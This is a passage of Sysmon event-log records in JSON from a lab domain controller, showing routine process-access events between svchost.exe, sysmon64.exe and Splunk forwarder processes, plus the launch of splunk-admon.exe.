C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2715,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2716,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2717,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2718,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2719,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2720,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2721,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0209-5F25-0000-0010B2DB0400}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0209-5F25-0000-0010B2DB0400}","TargetProcessId":"4276","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2722,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.055\r\nProcessGuid: {A837DB8D-020A-5F25-0000-001072DD0400}\r\nProcessId: 4228\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.055","ProcessGuid":"{A837DB8D-020A-5F25-0000-001072DD0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 